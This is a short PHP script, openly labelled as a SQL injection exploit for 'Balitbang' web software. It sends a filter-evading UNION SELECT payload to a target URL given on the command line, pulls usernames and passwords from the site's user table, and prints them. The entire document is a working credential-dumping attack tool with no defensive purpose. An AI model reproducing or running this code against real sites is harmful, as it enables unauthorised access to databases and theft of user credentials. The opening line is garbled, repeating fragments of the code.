<?phperror_reporting(0);echo "\n";echo "##########################\n";ec

1. <?php
2. error_reporting(0);
3. echo "\n";
4. echo "##########################\n";
5. echo "# Exploit Sqli Balitbang #\n";
6. echo "# ICWR-TECH #\n";
7. echo "# Coded By Afrizal F.A #\n";
8. echo "##########################\n";
9. $url = $argv[1];
10. echo "\n[+] Exploiting : $url\n";
11. $c = curl_init();
12. $dios = "(select+group_concat('<result>',username,0x3a,password,'</result>')+from+user)";
13. curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
14. curl_setopt($c, CURLOPT_URL, $url);
15. curl_setopt($c, CURLOPT_POSTFIELDS, "queryString=exploit'/**//*!12345uNIoN*//**//*!12345sELEcT*//**/$dios,version()-- -");
16. curl_setopt($c, CURLOPT_VERBOSE, false);
17. $str = curl_exec($c);
18. $preg = preg_match_all("'<result>(.*?)</result>'si", $str, $isi);
19. if(!empty($isi[1])) {
20. echo "\n[+] Exploit Success\n";
21. echo "\n[+] Getting Data\n";
22. echo "\n[+] Result Data :\n";
23. $i=1;
24. foreach($isi[1] as $get) {
25. $ubah = "[+] Username : ".str_replace(":", "\n[+] Password : ", $get);
26. echo "\n\n[+] Data ".$i++." [+]";
27. echo "\n$ubah";
28. echo "\n[+] End Data [+]";
29. }
30. } else {
31. echo "\n[-] Target : $url ( Failed )";
32. }
33. echo "\n\n";
34. ?>